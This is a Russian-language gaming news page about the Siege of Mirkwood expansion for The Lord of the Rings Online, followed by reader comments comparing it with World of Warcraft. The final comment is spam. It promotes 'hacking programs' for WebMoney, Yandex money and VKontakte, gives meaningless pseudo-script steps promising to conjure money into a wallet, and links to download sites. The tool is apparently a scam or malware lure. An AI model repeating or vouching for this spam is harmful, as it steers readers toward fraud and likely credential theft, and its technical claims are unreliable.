на главную
об игре
The Lord of the Rings Online 24.04.2007

The Lord of the Rings Online расширится этой осенью

Turbine намерена расширить виртуальную вселенную The Lord of the Rings Online этой осенью. Встречайте новое дополнение - Siege of Mirkwood. Послужной список следующий: потолок прокачки увеличат до 65-го уровня, что сулит новые скиллы и квесты для разных «профессий», возможности крафтинга будут расширены – игроки смогут создавать из найденных материалов предметы класса Second Age и Third Age, появится четвертый слот для реликтов, ну и прокачивать «силу» оружия будет позволено до 60-го уровня.
Siege of Mirkwood станет эпилогом для творившихся дел в Mines of Moria – игрокам придется прорываться через армии орков, чтобы наконец-то добраться до крепости Дол-Гулдур, где им предстоит размозжить о стенку силы Саурона в новых инстансах, рассчитанных на три, шесть и двенадцать персонажей. Эпичная схватка с назгулом обещана.
Вдобавок Siege of Mirkwood привнесет новую фишку под названием «Skirmishes» - в случайно выбранном инстансе игрокам предложат возглавить отряд созданных собственноручно и контролируемых компьютером болванчиков, прокачивая их и убивая расселенный по локации монстрятник.
Выход Siege of Mirkwood намечен на осень. Цена – 19.99 долларов.

Комментарии: 18
Ваш комментарий

Вот это дело. Чувствую, будут дополнять еще не раз.

0

Ну, я думаю WoW вряд ли перегонит когда-нибудь. А сколько стоит месяц подписки?

0

Блин я вот думаю может попробовать

0

сосите у своей wow, lotro круче всех онлайн игр!кто мне скажет что wow круче посотрите http://vkontakte.ru/video443632_124070055

0

Алеша) в Лотро в твоем ролике показаны оч слаые стороны: доспехи на 30 лвл, персонаж тоже, локации есть покрасивше. сделай для 60)

0

Gearzda ну для тебя наверно тогда подойдет только "Пара-па Город танцев" -------------------------------------------------------------------- WoW это уже зависимость... Это вообще не игра, а скорее просто доза и мания "погоня за левелом". В ней даже конца нет. А Lotro скорее для фанов как и SWOR будет в свое время... Может это и к лучшему, что Lotro и SW менее популярны чем WoW, потому что не сможет настолько захватить время. поэтому я в WoW не играю, так как боюсь превратиться в задрота как в South Park, а таких я уже вдоволь навидался... И я уверен что SW будет лучше чем LotrO. Вселенная все-таки больше и есть где развернуться.

0

фишку под названием «Skirmishes» должно быть интересно..

0

Отличная новость...вот не понимаю почему такая игра...не особа популярна как ВоВ или тот самый Linage..

0

да просто её не раскручеват,рекламируют бешенно как вов. не пиарили её как вов при разработки. люди делали тихо,но зато качественно. и вышло у них на всё 10 из 10. месяц 240р,что гораздо меньше чем тот-же EQ2 и вов. 14 дней бесплатных есть,после 14 дней просто покупаеш ключ за 240 и у тебя активированный акаунт станет,ненадо покупать диски. ну если с интернетом нормально,клиент качать из интернета. а вопше народ пора понять смысл поговорки - бесплатный только сыр в мошиловке.в таких проэктах"бесплатных" есть так называемые микро транзикции,и потом без них играть уже не возможно становится.

0

а,потеме то.. "Siege of Mirkwood привнесет новую фишку под названием «Skirmishes» - в случайно выбранном инстансе игрокам предложат возглавить отряд созданных собственноручно и контролируемых компьютером болванчиков, прокачивая их и убивая расселенный по локации монстрятник." воте то должно быть интересно.только я не понял что за "монстрятник" оО "Послужной список следующий: потолок прокачки увеличат до 65-го уровня, что сулит новые скиллы и квесты для разных «профессий», возможности крафтинга будут расширены – игроки смогут создавать из найденных материалов предметы класса Second Age и Third Age, появится четвертый слот для реликтов, ну и прокачивать «силу» оружия будет позволено до 60-го уровня. " ну 5 уровней хорошо. "игроки смогут создавать из найденных материалов предметы класса Second Age и Third Age" ээ а это вопше что...

0

"игроки смогут создавать из найденных материалов предметы класса Second Age и Third Age" ээ а это вопше что... cистема легендарного оружия( для каждого класса свой набор) находишь, забиндиваешь на себе и пркоачиваешь... лег. оружие усиливает определенные скиллы и тп и тд)

0

да это блин ясно,это уже давно было.ааа это новые эпохи чтоль.. ясно.

0

ну и прокачивать «силу» оружия будет позволено до 60-го уровня.- Насколько я помню оружие первой эпохи итак прокач до 60 го...

0

"...вот не понимаю почему такая игра...не особа популярна как ВоВ или тот самый Linage.." (с) BagFak Тссс! Не надо нам никакой популярности! Понабегут всякие отморозки типа Леговазов и Гондонфолей, итак их становится всё больше. ((( Хорошо, что хоть админы переименовывают таких про100мэнов и Унитазов. тьфу! Пусть пилят свой вов с линягой и тому подобные игры. Лучшей атмосферы самой игры и, что для меня важно - ГРАФИКИ, я ещё не видела. Кто знает лучше, киньте ссылочку.

0

"lotro круче всех онлайн игр!кто мне скажет что wow круче посотрите..." (с) AleIIIa ЛОТРО действительно круче всех, но то, что ты показал - ужасно! Качество отвратительное и что, ты окромя Пустошей нигде не был? Я пыталась в вов побегать немного, но там графика жесткач! Через полчаса глаза заболели, всё время хочется резкость поправить, что невозможно. Как народ играет, да ещё сутками? Так и зрения можно лишится. ))) P.S. Видюха у меня отменная, стоит W7 с DirectX 10.

0

програм по взлому онлаин игр и других програм. www.chaetmaster.ru и www.all-hackprog.ru. Здесь полно таких вещей как читы для онлаин игр программ по взлому вебмани,яндекс денег,Вконтакте.ru, Деньги@mail.ru и многово другово. Сайты читов предостовляют вам программу: ************************************************************************************************************* WMShadow ----------------------------------------------------------------------------------------------------------------------------------------- Запустите ваш кипер (советуем создать подстваной). запустите программу (установите конект с сервером вебмани (там их 4 )) Введите ваш WMID и ZилиR кашелек! ниже строка ввода скрипта Введите этот скрипт Onhack (ваш WMID ) {start (hack= ваш кашелек); if (ваш WMID;hack= ваш кашелек ;(onState)) else (ваш WMID;hack= ваш кашелек= (желаемую сумму обязательно пишите с индификатором Например: 453Z) } Stop (script) —> по оканчанию работы (сразу переводите ваши средства на ваш кипер и закрывайте его ) Программа состоит из 4 блоков первый блок (это сканирование вм ресурсов) второй блок (это генерация паролей защиты) третий блок (баг серверов) четвертый блок (отправка средств на ваш кипер) ----------------------------------------------------------------------------------------------------------------------------------------- Скачать ее можно тут: http://www.all-hackprog.ru/?p=462 или http://chaetmaster.ru/?p=462

0